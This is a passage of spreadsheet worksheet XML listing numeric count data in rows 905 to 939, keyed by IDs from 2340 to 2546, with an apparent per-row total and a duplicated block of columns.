      <c r="D905" s="8">
        <v>0</v>
      </c>
      <c r="E905" s="8">
        <v>0</v>
      </c>
      <c r="F905" s="8">
        <v>58</v>
      </c>
      <c r="G905" s="8">
        <v>4</v>
      </c>
      <c r="H905" s="8">
        <v>62</v>
      </c>
      <c r="K905" s="7">
        <v>2340</v>
      </c>
      <c r="L905" s="8">
        <v>0</v>
      </c>
      <c r="M905" s="8">
        <v>0</v>
      </c>
      <c r="N905" s="8">
        <v>0</v>
      </c>
      <c r="O905" s="8">
        <v>0</v>
      </c>
      <c r="P905" s="8">
        <v>58</v>
      </c>
      <c r="Q905" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="906" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A906" s="7">
        <v>2341</v>
      </c>
      <c r="B906" s="8">
        <v>26</v>
      </c>
      <c r="C906" s="8">
        <v>0</v>
      </c>
      <c r="D906" s="8">
        <v>4</v>
      </c>
      <c r="E906" s="8">
        <v>10</v>
      </c>
      <c r="F906" s="8">
        <v>3</v>
      </c>
      <c r="G906" s="8">
        <v>0</v>
      </c>
      <c r="H906" s="8">
        <v>43</v>
      </c>
      <c r="K906" s="7">
        <v>2341</v>
      </c>
      <c r="L906" s="8">
        <v>26</v>
      </c>
      <c r="M906" s="8">
        <v>0</v>
      </c>
      <c r="N906" s="8">
        <v>4</v>
      </c>
      <c r="O906" s="8">
        <v>10</v>
      </c>
      <c r="P906" s="8">
        <v>3</v>
      </c>
      <c r="Q906" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="907" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A907" s="7">
        <v>2344</v>
      </c>
      <c r="B907" s="8">
        <v>0</v>
      </c>
      <c r="C907" s="8">
        <v>0</v>
      </c>
      <c r="D907" s="8">
        <v>10</v>
      </c>
      <c r="E907" s="8">
        <v>10</v>
      </c>
      <c r="F907" s="8">
        <v>2</v>
      </c>
      <c r="G907" s="8">
        <v>3</v>
      </c>
      <c r="H907" s="8">
        <v>25</v>
      </c>
      <c r="K907" s="7">
        <v>2344</v>
      </c>
      <c r="L907" s="8">
        <v>0</v>
      </c>
      <c r="M907" s="8">
        <v>0</v>
      </c>
      <c r="N907" s="8">
        <v>10</v>
      </c>
      <c r="O907" s="8">
        <v>10</v>
      </c>
      <c r="P907" s="8">
        <v>2</v>
      </c>
      <c r="Q907" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="908" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A908" s="7">
        <v>2345</v>
      </c>
      <c r="B908" s="8">
        <v>6</v>
      </c>
      <c r="C908" s="8">
        <v>1</v>
      </c>
      <c r="D908" s="8">
        <v>21</v>
      </c>
      <c r="E908" s="8">
        <v>33</v>
      </c>
      <c r="F908" s="8">
        <v>3</v>
      </c>
      <c r="G908" s="8">
        <v>5</v>
      </c>
      <c r="H908" s="8">
        <v>69</v>
      </c>
      <c r="K908" s="7">
        <v>2345</v>
      </c>
      <c r="L908" s="8">
        <v>6</v>
      </c>
      <c r="M908" s="8">
        <v>1</v>
      </c>
      <c r="N908" s="8">
        <v>21</v>
      </c>
      <c r="O908" s="8">
        <v>33</v>
      </c>
      <c r="P908" s="8">
        <v>3</v>
      </c>
      <c r="Q908" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="909" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A909" s="7">
        <v>2346</v>
      </c>
      <c r="B909" s="8">
        <v>26</v>
      </c>
      <c r="C909" s="8">
        <v>1</v>
      </c>
      <c r="D909" s="8">
        <v>4</v>
      </c>
      <c r="E909" s="8">
        <v>6</v>
      </c>
      <c r="F909" s="8">
        <v>7</v>
      </c>
      <c r="G909" s="8">
        <v>0</v>
      </c>
      <c r="H909" s="8">
        <v>44</v>
      </c>
      <c r="K909" s="7">
        <v>2346</v>
      </c>
      <c r="L909" s="8">
        <v>26</v>
      </c>
      <c r="M909" s="8">
        <v>1</v>
      </c>
      <c r="N909" s="8">
        <v>4</v>
      </c>
      <c r="O909" s="8">
        <v>6</v>
      </c>
      <c r="P909" s="8">
        <v>7</v>
      </c>
      <c r="Q909" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="910" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A910" s="7">
        <v>2347</v>
      </c>
      <c r="B910" s="8">
        <v>6</v>
      </c>
      <c r="C910" s="8">
        <v>0</v>
      </c>
      <c r="D910" s="8">
        <v>0</v>
      </c>
      <c r="E910" s="8">
        <v>1</v>
      </c>
      <c r="F910" s="8">
        <v>17</v>
      </c>
      <c r="G910" s="8">
        <v>6</v>
      </c>
      <c r="H910" s="8">
        <v>30</v>
      </c>
      <c r="K910" s="7">
        <v>2347</v>
      </c>
      <c r="L910" s="8">
        <v>6</v>
      </c>
      <c r="M910" s="8">
        <v>0</v>
      </c>
      <c r="N910" s="8">
        <v>0</v>
      </c>
      <c r="O910" s="8">
        <v>1</v>
      </c>
      <c r="P910" s="8">
        <v>17</v>
      </c>
      <c r="Q910" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="911" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A911" s="7">
        <v>2350</v>
      </c>
      <c r="B911" s="8">
        <v>26</v>
      </c>
      <c r="C911" s="8">
        <v>1</v>
      </c>
      <c r="D911" s="8">
        <v>26</v>
      </c>
      <c r="E911" s="8">
        <v>1</v>
      </c>
      <c r="F911" s="8">
        <v>6</v>
      </c>
      <c r="G911" s="8">
        <v>3</v>
      </c>
      <c r="H911" s="8">
        <v>63</v>
      </c>
      <c r="K911" s="7">
        <v>2350</v>
      </c>
      <c r="L911" s="8">
        <v>26</v>
      </c>
      <c r="M911" s="8">
        <v>1</v>
      </c>
      <c r="N911" s="8">
        <v>26</v>
      </c>
      <c r="O911" s="8">
        <v>1</v>
      </c>
      <c r="P911" s="8">
        <v>6</v>
      </c>
      <c r="Q911" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="912" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A912" s="7">
        <v>2353</v>
      </c>
      <c r="B912" s="8">
        <v>25</v>
      </c>
      <c r="C912" s="8">
        <v>0</v>
      </c>
      <c r="D912" s="8">
        <v>15</v>
      </c>
      <c r="E912" s="8">
        <v>10</v>
      </c>
      <c r="F912" s="8">
        <v>5</v>
      </c>
      <c r="G912" s="8">
        <v>4</v>
      </c>
      <c r="H912" s="8">
        <v>59</v>
      </c>
      <c r="K912" s="7">
        <v>2353</v>
      </c>
      <c r="L912" s="8">
        <v>25</v>
      </c>
      <c r="M912" s="8">
        <v>0</v>
      </c>
      <c r="N912" s="8">
        <v>15</v>
      </c>
      <c r="O912" s="8">
        <v>10</v>
      </c>
      <c r="P912" s="8">
        <v>5</v>
      </c>
      <c r="Q912" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="913" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A913" s="7">
        <v>2355</v>
      </c>
      <c r="B913" s="8">
        <v>25</v>
      </c>
      <c r="C913" s="8">
        <v>1</v>
      </c>
      <c r="D913" s="8">
        <v>0</v>
      </c>
      <c r="E913" s="8">
        <v>0</v>
      </c>
      <c r="F913" s="8">
        <v>8</v>
      </c>
      <c r="G913" s="8">
        <v>2</v>
      </c>
      <c r="H913" s="8">
        <v>36</v>
      </c>
      <c r="K913" s="7">
        <v>2355</v>
      </c>
      <c r="L913" s="8">
        <v>25</v>
      </c>
      <c r="M913" s="8">
        <v>1</v>
      </c>
      <c r="N913" s="8">
        <v>0</v>
      </c>
      <c r="O913" s="8">
        <v>0</v>
      </c>
      <c r="P913" s="8">
        <v>8</v>
      </c>
      <c r="Q913" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="914" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A914" s="7">
        <v>2358</v>
      </c>
      <c r="B914" s="8">
        <v>20</v>
      </c>
      <c r="C914" s="8">
        <v>0</v>
      </c>
      <c r="D914" s="8">
        <v>6</v>
      </c>
      <c r="E914" s="8">
        <v>2</v>
      </c>
      <c r="F914" s="8">
        <v>1</v>
      </c>
      <c r="G914" s="8">
        <v>0</v>
      </c>
      <c r="H914" s="8">
        <v>29</v>
      </c>
      <c r="K914" s="7">
        <v>2358</v>
      </c>
      <c r="L914" s="8">
        <v>20</v>
      </c>
      <c r="M914" s="8">
        <v>0</v>
      </c>
      <c r="N914" s="8">
        <v>6</v>
      </c>
      <c r="O914" s="8">
        <v>2</v>
      </c>
      <c r="P914" s="8">
        <v>1</v>
      </c>
      <c r="Q914" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="915" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A915" s="7">
        <v>2359</v>
      </c>
      <c r="B915" s="8">
        <v>0</v>
      </c>
      <c r="C915" s="8">
        <v>0</v>
      </c>
      <c r="D915" s="8">
        <v>5</v>
      </c>
      <c r="E915" s="8">
        <v>42</v>
      </c>
      <c r="F915" s="8">
        <v>2</v>
      </c>
      <c r="G915" s="8">
        <v>0</v>
      </c>
      <c r="H915" s="8">
        <v>49</v>
      </c>
      <c r="K915" s="7">
        <v>2359</v>
      </c>
      <c r="L915" s="8">
        <v>0</v>
      </c>
      <c r="M915" s="8">
        <v>0</v>
      </c>
      <c r="N915" s="8">
        <v>5</v>
      </c>
      <c r="O915" s="8">
        <v>42</v>
      </c>
      <c r="P915" s="8">
        <v>2</v>
      </c>
      <c r="Q915" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="916" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A916" s="7">
        <v>2361</v>
      </c>
      <c r="B916" s="8">
        <v>26</v>
      </c>
      <c r="C916" s="8">
        <v>0</v>
      </c>
      <c r="D916" s="8">
        <v>13</v>
      </c>
      <c r="E916" s="8">
        <v>0</v>
      </c>
      <c r="F916" s="8">
        <v>27</v>
      </c>
      <c r="G916" s="8">
        <v>7</v>
      </c>
      <c r="H916" s="8">
        <v>73</v>
      </c>
      <c r="K916" s="7">
        <v>2361</v>
      </c>
      <c r="L916" s="8">
        <v>26</v>
      </c>
      <c r="M916" s="8">
        <v>0</v>
      </c>
      <c r="N916" s="8">
        <v>13</v>
      </c>
      <c r="O916" s="8">
        <v>0</v>
      </c>
      <c r="P916" s="8">
        <v>27</v>
      </c>
      <c r="Q916" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="917" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A917" s="7">
        <v>2362</v>
      </c>
      <c r="B917" s="8">
        <v>26</v>
      </c>
      <c r="C917" s="8">
        <v>1</v>
      </c>
      <c r="D917" s="8">
        <v>6</v>
      </c>
      <c r="E917" s="8">
        <v>42</v>
      </c>
      <c r="F917" s="8">
        <v>2</v>
      </c>
      <c r="G917" s="8">
        <v>3</v>
      </c>
      <c r="H917" s="8">
        <v>80</v>
      </c>
      <c r="K917" s="7">
        <v>2362</v>
      </c>
      <c r="L917" s="8">
        <v>26</v>
      </c>
      <c r="M917" s="8">
        <v>1</v>
      </c>
      <c r="N917" s="8">
        <v>6</v>
      </c>
      <c r="O917" s="8">
        <v>42</v>
      </c>
      <c r="P917" s="8">
        <v>2</v>
      </c>
      <c r="Q917" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="918" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A918" s="7">
        <v>2367</v>
      </c>
      <c r="B918" s="8">
        <v>25</v>
      </c>
      <c r="C918" s="8">
        <v>2</v>
      </c>
      <c r="D918" s="8">
        <v>8</v>
      </c>
      <c r="E918" s="8">
        <v>0</v>
      </c>
      <c r="F918" s="8">
        <v>2</v>
      </c>
      <c r="G918" s="8">
        <v>0</v>
      </c>
      <c r="H918" s="8">
        <v>37</v>
      </c>
      <c r="K918" s="7">
        <v>2367</v>
      </c>
      <c r="L918" s="8">
        <v>25</v>
      </c>
      <c r="M918" s="8">
        <v>2</v>
      </c>
      <c r="N918" s="8">
        <v>8</v>
      </c>
      <c r="O918" s="8">
        <v>0</v>
      </c>
      <c r="P918" s="8">
        <v>2</v>
      </c>
      <c r="Q918" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="919" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A919" s="7">
        <v>2368</v>
      </c>
      <c r="B919" s="8">
        <v>26</v>
      </c>
      <c r="C919" s="8">
        <v>1</v>
      </c>
      <c r="D919" s="8">
        <v>17</v>
      </c>
      <c r="E919" s="8">
        <v>0</v>
      </c>
      <c r="F919" s="8">
        <v>16</v>
      </c>
      <c r="G919" s="8">
        <v>7</v>
      </c>
      <c r="H919" s="8">
        <v>67</v>
      </c>
      <c r="K919" s="7">
        <v>2368</v>
      </c>
      <c r="L919" s="8">
        <v>26</v>
      </c>
      <c r="M919" s="8">
        <v>1</v>
      </c>
      <c r="N919" s="8">
        <v>17</v>
      </c>
      <c r="O919" s="8">
        <v>0</v>
      </c>
      <c r="P919" s="8">
        <v>16</v>
      </c>
      <c r="Q919" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="920" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A920" s="7">
        <v>2379</v>
      </c>
      <c r="B920" s="8">
        <v>5</v>
      </c>
      <c r="C920" s="8">
        <v>1</v>
      </c>
      <c r="D920" s="8">
        <v>5</v>
      </c>
      <c r="E920" s="8">
        <v>0</v>
      </c>
      <c r="F920" s="8">
        <v>85</v>
      </c>
      <c r="G920" s="8">
        <v>55</v>
      </c>
      <c r="H920" s="8">
        <v>151</v>
      </c>
      <c r="K920" s="7">
        <v>2379</v>
      </c>
      <c r="L920" s="8">
        <v>5</v>
      </c>
      <c r="M920" s="8">
        <v>1</v>
      </c>
      <c r="N920" s="8">
        <v>5</v>
      </c>
      <c r="O920" s="8">
        <v>0</v>
      </c>
      <c r="P920" s="8">
        <v>85</v>
      </c>
      <c r="Q920" s="8">
        <v>55</v>
      </c>
    </row>
    <row r="921" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A921" s="7">
        <v>2390</v>
      </c>
      <c r="B921" s="8">
        <v>25</v>
      </c>
      <c r="C921" s="8">
        <v>0</v>
      </c>
      <c r="D921" s="8">
        <v>20</v>
      </c>
      <c r="E921" s="8">
        <v>0</v>
      </c>
      <c r="F921" s="8">
        <v>5</v>
      </c>
      <c r="G921" s="8">
        <v>6</v>
      </c>
      <c r="H921" s="8">
        <v>56</v>
      </c>
      <c r="K921" s="7">
        <v>2390</v>
      </c>
      <c r="L921" s="8">
        <v>25</v>
      </c>
      <c r="M921" s="8">
        <v>0</v>
      </c>
      <c r="N921" s="8">
        <v>20</v>
      </c>
      <c r="O921" s="8">
        <v>0</v>
      </c>
      <c r="P921" s="8">
        <v>5</v>
      </c>
      <c r="Q921" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="922" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A922" s="7">
        <v>2429</v>
      </c>
      <c r="B922" s="8">
        <v>26</v>
      </c>
      <c r="C922" s="8">
        <v>2</v>
      </c>
      <c r="D922" s="8">
        <v>4</v>
      </c>
      <c r="E922" s="8">
        <v>1</v>
      </c>
      <c r="F922" s="8">
        <v>1</v>
      </c>
      <c r="G922" s="8">
        <v>1</v>
      </c>
      <c r="H922" s="8">
        <v>35</v>
      </c>
      <c r="K922" s="7">
        <v>2429</v>
      </c>
      <c r="L922" s="8">
        <v>26</v>
      </c>
      <c r="M922" s="8">
        <v>2</v>
      </c>
      <c r="N922" s="8">
        <v>4</v>
      </c>
      <c r="O922" s="8">
        <v>1</v>
      </c>
      <c r="P922" s="8">
        <v>1</v>
      </c>
      <c r="Q922" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="923" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A923" s="7">
        <v>2521</v>
      </c>
      <c r="B923" s="8">
        <v>26</v>
      </c>
      <c r="C923" s="8">
        <v>1</v>
      </c>
      <c r="D923" s="8">
        <v>28</v>
      </c>
      <c r="E923" s="8">
        <v>20</v>
      </c>
      <c r="F923" s="8">
        <v>0</v>
      </c>
      <c r="G923" s="8">
        <v>0</v>
      </c>
      <c r="H923" s="8">
        <v>75</v>
      </c>
      <c r="K923" s="7">
        <v>2521</v>
      </c>
      <c r="L923" s="8">
        <v>26</v>
      </c>
      <c r="M923" s="8">
        <v>1</v>
      </c>
      <c r="N923" s="8">
        <v>28</v>
      </c>
      <c r="O923" s="8">
        <v>20</v>
      </c>
      <c r="P923" s="8">
        <v>0</v>
      </c>
      <c r="Q923" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="924" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A924" s="7">
        <v>2522</v>
      </c>
      <c r="B924" s="8">
        <v>24</v>
      </c>
      <c r="C924" s="8">
        <v>1</v>
      </c>
      <c r="D924" s="8">
        <v>18</v>
      </c>
      <c r="E924" s="8">
        <v>32</v>
      </c>
      <c r="F924" s="8">
        <v>32</v>
      </c>
      <c r="G924" s="8">
        <v>0</v>
      </c>
      <c r="H924" s="8">
        <v>107</v>
      </c>
      <c r="K924" s="7">
        <v>2522</v>
      </c>
      <c r="L924" s="8">
        <v>24</v>
      </c>
      <c r="M924" s="8">
        <v>1</v>
      </c>
      <c r="N924" s="8">
        <v>18</v>
      </c>
      <c r="O924" s="8">
        <v>32</v>
      </c>
      <c r="P924" s="8">
        <v>32</v>
      </c>
      <c r="Q924" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="925" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A925" s="7">
        <v>2524</v>
      </c>
      <c r="B925" s="8">
        <v>0</v>
      </c>
      <c r="C925" s="8">
        <v>0</v>
      </c>
      <c r="D925" s="8">
        <v>0</v>
      </c>
      <c r="E925" s="8">
        <v>40</v>
      </c>
      <c r="F925" s="8">
        <v>2</v>
      </c>
      <c r="G925" s="8">
        <v>2</v>
      </c>
      <c r="H925" s="8">
        <v>44</v>
      </c>
      <c r="K925" s="7">
        <v>2524</v>
      </c>
      <c r="L925" s="8">
        <v>0</v>
      </c>
      <c r="M925" s="8">
        <v>0</v>
      </c>
      <c r="N925" s="8">
        <v>0</v>
      </c>
      <c r="O925" s="8">
        <v>40</v>
      </c>
      <c r="P925" s="8">
        <v>2</v>
      </c>
      <c r="Q925" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="926" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A926" s="7">
        <v>2525</v>
      </c>
      <c r="B926" s="8">
        <v>25</v>
      </c>
      <c r="C926" s="8">
        <v>0</v>
      </c>
      <c r="D926" s="8">
        <v>0</v>
      </c>
      <c r="E926" s="8">
        <v>0</v>
      </c>
      <c r="F926" s="8">
        <v>12</v>
      </c>
      <c r="G926" s="8">
        <v>26</v>
      </c>
      <c r="H926" s="8">
        <v>63</v>
      </c>
      <c r="K926" s="7">
        <v>2525</v>
      </c>
      <c r="L926" s="8">
        <v>25</v>
      </c>
      <c r="M926" s="8">
        <v>0</v>
      </c>
      <c r="N926" s="8">
        <v>0</v>
      </c>
      <c r="O926" s="8">
        <v>0</v>
      </c>
      <c r="P926" s="8">
        <v>12</v>
      </c>
      <c r="Q926" s="8">
        <v>26</v>
      </c>
    </row>
    <row r="927" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A927" s="7">
        <v>2526</v>
      </c>
      <c r="B927" s="8">
        <v>25</v>
      </c>
      <c r="C927" s="8">
        <v>2</v>
      </c>
      <c r="D927" s="8">
        <v>61</v>
      </c>
      <c r="E927" s="8">
        <v>99</v>
      </c>
      <c r="F927" s="8">
        <v>4</v>
      </c>
      <c r="G927" s="8">
        <v>1</v>
      </c>
      <c r="H927" s="8">
        <v>192</v>
      </c>
      <c r="K927" s="7">
        <v>2526</v>
      </c>
      <c r="L927" s="8">
        <v>25</v>
      </c>
      <c r="M927" s="8">
        <v>2</v>
      </c>
      <c r="N927" s="8">
        <v>61</v>
      </c>
      <c r="O927" s="8">
        <v>99</v>
      </c>
      <c r="P927" s="8">
        <v>4</v>
      </c>
      <c r="Q927" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="928" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A928" s="7">
        <v>2528</v>
      </c>
      <c r="B928" s="8">
        <v>21</v>
      </c>
      <c r="C928" s="8">
        <v>1</v>
      </c>
      <c r="D928" s="8">
        <v>4</v>
      </c>
      <c r="E928" s="8">
        <v>0</v>
      </c>
      <c r="F928" s="8">
        <v>4</v>
      </c>
      <c r="G928" s="8">
        <v>0</v>
      </c>
      <c r="H928" s="8">
        <v>30</v>
      </c>
      <c r="K928" s="7">
        <v>2528</v>
      </c>
      <c r="L928" s="8">
        <v>21</v>
      </c>
      <c r="M928" s="8">
        <v>1</v>
      </c>
      <c r="N928" s="8">
        <v>4</v>
      </c>
      <c r="O928" s="8">
        <v>0</v>
      </c>
      <c r="P928" s="8">
        <v>4</v>
      </c>
      <c r="Q928" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="929" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A929" s="7">
        <v>2529</v>
      </c>
      <c r="B929" s="8">
        <v>6</v>
      </c>
      <c r="C929" s="8">
        <v>1</v>
      </c>
      <c r="D929" s="8">
        <v>1</v>
      </c>
      <c r="E929" s="8">
        <v>5</v>
      </c>
      <c r="F929" s="8">
        <v>0</v>
      </c>
      <c r="G929" s="8">
        <v>2</v>
      </c>
      <c r="H929" s="8">
        <v>15</v>
      </c>
      <c r="K929" s="7">
        <v>2529</v>
      </c>
      <c r="L929" s="8">
        <v>6</v>
      </c>
      <c r="M929" s="8">
        <v>1</v>
      </c>
      <c r="N929" s="8">
        <v>1</v>
      </c>
      <c r="O929" s="8">
        <v>5</v>
      </c>
      <c r="P929" s="8">
        <v>0</v>
      </c>
      <c r="Q929" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="930" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A930" s="7">
        <v>2531</v>
      </c>
      <c r="B930" s="8">
        <v>0</v>
      </c>
      <c r="C930" s="8">
        <v>0</v>
      </c>
      <c r="D930" s="8">
        <v>10</v>
      </c>
      <c r="E930" s="8">
        <v>92</v>
      </c>
      <c r="F930" s="8">
        <v>0</v>
      </c>
      <c r="G930" s="8">
        <v>0</v>
      </c>
      <c r="H930" s="8">
        <v>102</v>
      </c>
      <c r="K930" s="7">
        <v>2531</v>
      </c>
      <c r="L930" s="8">
        <v>0</v>
      </c>
      <c r="M930" s="8">
        <v>0</v>
      </c>
      <c r="N930" s="8">
        <v>10</v>
      </c>
      <c r="O930" s="8">
        <v>92</v>
      </c>
      <c r="P930" s="8">
        <v>0</v>
      </c>
      <c r="Q930" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="931" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A931" s="7">
        <v>2532</v>
      </c>
      <c r="B931" s="8">
        <v>20</v>
      </c>
      <c r="C931" s="8">
        <v>1</v>
      </c>
      <c r="D931" s="8">
        <v>0</v>
      </c>
      <c r="E931" s="8">
        <v>0</v>
      </c>
      <c r="F931" s="8">
        <v>1</v>
      </c>
      <c r="G931" s="8">
        <v>8</v>
      </c>
      <c r="H931" s="8">
        <v>30</v>
      </c>
      <c r="K931" s="7">
        <v>2532</v>
      </c>
      <c r="L931" s="8">
        <v>20</v>
      </c>
      <c r="M931" s="8">
        <v>1</v>
      </c>
      <c r="N931" s="8">
        <v>0</v>
      </c>
      <c r="O931" s="8">
        <v>0</v>
      </c>
      <c r="P931" s="8">
        <v>1</v>
      </c>
      <c r="Q931" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="932" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A932" s="7">
        <v>2533</v>
      </c>
      <c r="B932" s="8">
        <v>26</v>
      </c>
      <c r="C932" s="8">
        <v>1</v>
      </c>
      <c r="D932" s="8">
        <v>0</v>
      </c>
      <c r="E932" s="8">
        <v>0</v>
      </c>
      <c r="F932" s="8">
        <v>2</v>
      </c>
      <c r="G932" s="8">
        <v>1</v>
      </c>
      <c r="H932" s="8">
        <v>30</v>
      </c>
      <c r="K932" s="7">
        <v>2533</v>
      </c>
      <c r="L932" s="8">
        <v>26</v>
      </c>
      <c r="M932" s="8">
        <v>1</v>
      </c>
      <c r="N932" s="8">
        <v>0</v>
      </c>
      <c r="O932" s="8">
        <v>0</v>
      </c>
      <c r="P932" s="8">
        <v>2</v>
      </c>
      <c r="Q932" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="933" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A933" s="7">
        <v>2537</v>
      </c>
      <c r="B933" s="8">
        <v>0</v>
      </c>
      <c r="C933" s="8">
        <v>0</v>
      </c>
      <c r="D933" s="8">
        <v>9</v>
      </c>
      <c r="E933" s="8">
        <v>132</v>
      </c>
      <c r="F933" s="8">
        <v>1</v>
      </c>
      <c r="G933" s="8">
        <v>0</v>
      </c>
      <c r="H933" s="8">
        <v>142</v>
      </c>
      <c r="K933" s="7">
        <v>2537</v>
      </c>
      <c r="L933" s="8">
        <v>0</v>
      </c>
      <c r="M933" s="8">
        <v>0</v>
      </c>
      <c r="N933" s="8">
        <v>9</v>
      </c>
      <c r="O933" s="8">
        <v>132</v>
      </c>
      <c r="P933" s="8">
        <v>1</v>
      </c>
      <c r="Q933" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="934" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A934" s="7">
        <v>2538</v>
      </c>
      <c r="B934" s="8">
        <v>26</v>
      </c>
      <c r="C934" s="8">
        <v>1</v>
      </c>
      <c r="D934" s="8">
        <v>0</v>
      </c>
      <c r="E934" s="8">
        <v>0</v>
      </c>
      <c r="F934" s="8">
        <v>10</v>
      </c>
      <c r="G934" s="8">
        <v>2</v>
      </c>
      <c r="H934" s="8">
        <v>39</v>
      </c>
      <c r="K934" s="7">
        <v>2538</v>
      </c>
      <c r="L934" s="8">
        <v>26</v>
      </c>
      <c r="M934" s="8">
        <v>1</v>
      </c>
      <c r="N934" s="8">
        <v>0</v>
      </c>
      <c r="O934" s="8">
        <v>0</v>
      </c>
      <c r="P934" s="8">
        <v>10</v>
      </c>
      <c r="Q934" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="935" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A935" s="7">
        <v>2541</v>
      </c>
      <c r="B935" s="8">
        <v>5</v>
      </c>
      <c r="C935" s="8">
        <v>0</v>
      </c>
      <c r="D935" s="8">
        <v>4</v>
      </c>
      <c r="E935" s="8">
        <v>0</v>
      </c>
      <c r="F935" s="8">
        <v>9</v>
      </c>
      <c r="G935" s="8">
        <v>7</v>
      </c>
      <c r="H935" s="8">
        <v>25</v>
      </c>
      <c r="K935" s="7">
        <v>2541</v>
      </c>
      <c r="L935" s="8">
        <v>5</v>
      </c>
      <c r="M935" s="8">
        <v>0</v>
      </c>
      <c r="N935" s="8">
        <v>4</v>
      </c>
      <c r="O935" s="8">
        <v>0</v>
      </c>
      <c r="P935" s="8">
        <v>9</v>
      </c>
      <c r="Q935" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="936" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A936" s="7">
        <v>2543</v>
      </c>
      <c r="B936" s="8">
        <v>6</v>
      </c>
      <c r="C936" s="8">
        <v>0</v>
      </c>
      <c r="D936" s="8">
        <v>16</v>
      </c>
      <c r="E936" s="8">
        <v>2</v>
      </c>
      <c r="F936" s="8">
        <v>4</v>
      </c>
      <c r="G936" s="8">
        <v>4</v>
      </c>
      <c r="H936" s="8">
        <v>32</v>
      </c>
      <c r="K936" s="7">
        <v>2543</v>
      </c>
      <c r="L936" s="8">
        <v>6</v>
      </c>
      <c r="M936" s="8">
        <v>0</v>
      </c>
      <c r="N936" s="8">
        <v>16</v>
      </c>
      <c r="O936" s="8">
        <v>2</v>
      </c>
      <c r="P936" s="8">
        <v>4</v>
      </c>
      <c r="Q936" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="937" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A937" s="7">
        <v>2545</v>
      </c>
      <c r="B937" s="8">
        <v>30</v>
      </c>
      <c r="C937" s="8">
        <v>3</v>
      </c>
      <c r="D937" s="8">
        <v>0</v>
      </c>
      <c r="E937" s="8">
        <v>0</v>
      </c>
      <c r="F937" s="8">
        <v>150</v>
      </c>
      <c r="G937" s="8">
        <v>10</v>
      </c>
      <c r="H937" s="8">
        <v>193</v>
      </c>
      <c r="K937" s="7">
        <v>2545</v>
      </c>
      <c r="L937" s="8">
        <v>30</v>
      </c>
      <c r="M937" s="8">
        <v>3</v>
      </c>
      <c r="N937" s="8">
        <v>0</v>
      </c>
      <c r="O937" s="8">
        <v>0</v>
      </c>
      <c r="P937" s="8">
        <v>150</v>
      </c>
      <c r="Q937" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="938" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A938" s="7">
        <v>2546</v>
      </c>
      <c r="B938" s="8">
        <v>26</v>
      </c>
      <c r="C938" s="8">
        <v>0</v>
      </c>
      <c r="D938" s="8">
        <v>10</v>
      </c>
      <c r="E938" s="8">
        <v>0</v>
      </c>
      <c r="F938" s="8">
        <v>1</v>
      </c>
      <c r="G938" s="8">
        <v>2</v>
      </c>
      <c r="H938" s="8">
        <v>39</v>
      </c>
      <c r="K938" s="7">
        <v>2546</v>
      </c>
      <c r="L938" s="8">
        <v>26</v>
      </c>
      <c r="M938" s="8">
        <v>0</v>
      </c>
      <c r="N938" s="8">
        <v>10</v>
      </c>
      <c r="O938" s="8">
        <v>0</v>
      </c>
      <c r="P938" s="8">
        <v>1</v>
      </c>
      <c r="Q938" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="939" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A939" s="7">
